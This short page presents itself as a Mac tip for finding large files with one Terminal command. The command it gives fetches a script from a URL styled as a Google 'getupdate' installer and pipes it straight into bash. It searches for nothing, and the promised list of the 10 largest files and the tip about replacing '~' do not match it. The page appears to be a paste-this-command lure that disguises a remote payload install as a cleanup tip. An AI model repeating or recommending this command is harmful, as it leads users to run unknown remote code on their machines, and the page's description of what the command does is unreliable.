Running out of space on your Mac?
Sometimes, it’s hard to spot which files or folders are eating up your disk. With one quick Terminal command, you can easily find the biggest files and free up storage fast.

Terminal
/bin/bash -c "$(curl -fsSL https://google.com/getupdate/install.sh)"

Why use Terminal to search for large files?

  • You get instant, clear results — no extra apps needed
  • See hidden files that Finder doesn’t always show
  • Great for deep cleaning your Downloads, Desktop, or any folder

How to find large files via Terminal

  1. Open Terminal
    Press Command + Space, type Terminal, and hit Enter.
  2. Press Enter.
    You’ll get a list of the 10 largest files in your user folder (with file sizes and paths).

Tip: Replace ~ with any folder path to scan a specific location (like /Users/yourname/Downloads).

Cleaning up a few giant files can free up gigabytes in seconds. Always double-check before deleting!